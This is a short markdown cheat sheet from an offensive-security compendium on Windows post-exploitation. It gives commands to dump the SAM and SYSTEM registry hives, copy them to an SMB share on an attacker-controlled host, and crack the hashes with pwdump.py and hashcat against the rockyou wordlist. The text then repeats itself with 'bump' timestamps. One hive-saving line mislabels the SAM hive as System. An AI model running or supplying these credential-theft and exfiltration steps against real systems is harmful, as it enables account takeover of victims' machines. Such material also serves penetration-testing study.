killchain-compendium/post_exploitation/docs/powershell.md

# Powershell

## HashDump
```sh
save HKLM\SAM C:\Users\Administrator\Desktop\SAM
save HKLM\SAM C:\Users\Administrator\Desktop\System
```
* Use `samdump2`

## Extract Hashes
* Extract via smb server on attacker
```
copy C:\Windows\Repair\SAM \\<attacker-IP>\dir\
copy C:\Windows\Repair\SYSTEM \\<attacker-IP>\dir\
```
* Crack via [creddump7](git clone https://github.com/Tib3rius/creddump7)
```
python pwdump.py SYSTEM SAM
```
or
```
hashcat -m 1000 --force <hash> /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
```
bump 2021-09-08 02:09:14 +02:00			`# Powershell`

			`## HashDump`
			```sh
			`save HKLM\SAM C:\Users\Administrator\Desktop\SAM`
			`save HKLM\SAM C:\Users\Administrator\Desktop\System`
			```
			* Use `samdump2`
bump 2021-10-16 00:40:15 +02:00
			`## Extract Hashes`
			`* Extract via smb server on attacker`
			```
			`copy C:\Windows\Repair\SAM \\<attacker-IP>\dir\`
			`copy C:\Windows\Repair\SYSTEM \\<attacker-IP>\dir\`
			```
			`* Crack via [creddump7](git clone https://github.com/Tib3rius/creddump7)`
			```
			`python pwdump.py SYSTEM SAM`
			```
			`or`
			```
			`hashcat -m 1000 --force <hash> /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt`
			```